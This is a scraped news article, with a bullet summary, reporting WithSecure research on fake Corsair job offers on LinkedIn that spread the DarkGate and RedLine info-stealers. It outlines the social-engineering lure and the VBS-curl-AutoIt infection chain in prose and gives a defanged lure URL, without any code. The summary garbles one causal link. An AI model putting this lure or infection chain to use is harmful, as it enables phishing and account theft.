Article Details
Scrape Timestamp (UTC): 2023-10-20 12:52:23.439
Original Article Text
Click to Toggle View
Fake Corsair job offers on LinkedIn push DarkGate malware. A threat actor is using fake LinkedIn posts and direct messages about a Facebook Ads specialist position at hardware maker Corsair to lure people into downloading info-stealing malware like DarkGate and RedLine. Cybersecurity company WithSecure detected the activity and tracked the activity of the group, showing in a report today that it is linked to Vietnamese cybercriminal groups responsible for the ‘Ducktail’ campaigns first spotted last year. These campaigns aim to steal valuable Facebook business accounts that can be used for malvertising or sold to other cybercriminals. DarkGate was first spotted in 2017 but its deployment remained limited until June 2023, when its author decided to sell access to the malware to a larger audience. Recent examples of DarkGate's use include phishing attacks through Microsoft Teams that push the payload and leveraging compromised Skype accounts to send VBS scripts to trigger an infection chain leading to the malware. Corsair lure The Vietnamese threat actors targeted mainly users in the U.S., the U.K., and India, who hold social media management positions and are likely to have access to Facebook business accounts. The lure is delivered over LinkedIn and involves a job offer at Corsair. Targets are tricked into downloading malicious files from a URL(“g2[.]by/corsair-JD”) that redirects to Google Drive or Dropbox to drop a ZIP file (“Salary and new products.8.4.zip”) with a PDF or DOCX document and a TXT file with thefollowing names: WithSecure researchers analyzed the metadata for the above files and found leads to RedLine stealer distribution. The downloaded archive contains a VBS script, possibly embedded in the DOCX file, that copies and renames ‘curl.exe’ to a new location and leverages it to download ‘autoit3.exe’ and a compiled Autoit3 script. The executable launches the script, and the latter de-obfuscates itself and constructs DarkGate using strings present in the script. Thirty seconds after installation, the malware attempts to uninstall security products from the compromised system, indicating the existence of an automated process. LinkedIn introduced features to fight abuse in the platform late last year that can help users determine if an account is suspicious or fake. However, it falls on the users to check the verified info before engaging in communication with a new account. WithSecure has released a list of indicators of compromise (IoCs) that could help organizations defend against activity from this threat actor. The details include IP addresses, domains used, URLs, file metadata, and names of archives.
Daily Brief Summary
Cybersecurity firm WithSecure has observed a threat actor utilizing fake LinkedIn posts and messages about a position at hardware maker Corsair to distribute info-stealing malwares such as DarkGate and RedLine.
The threat actor is associated with Vietnamese cybercriminal groups responsible for the 'Ducktail' campaigns, which aim to steal Facebook business accounts for malvertising or resale.
Since its creator started selling access to DarkGate in June 2023, the malware has been used in phishing attacks via Microsoft Teams and has been spread through compromised Skype accounts.
Main targets of these malicious activities are users located in the U.S., U.K., and India, particularly those in social media management positions with likely access to Facebook business accounts.
Victims are tricked into downloading a malicious file containing a VBS script from a URL that redirects to Google Drive or Dropbox.
WithSecure's analysis links these activities to RedLine stealer distribution, as the malware attempts to uninstall security products from the compromised system 30 seconds after installation.
To help organizations protect against this threat, WithSecure has published a list of indicators of compromise, including IP addresses, URLs, file metadata, and names of archives.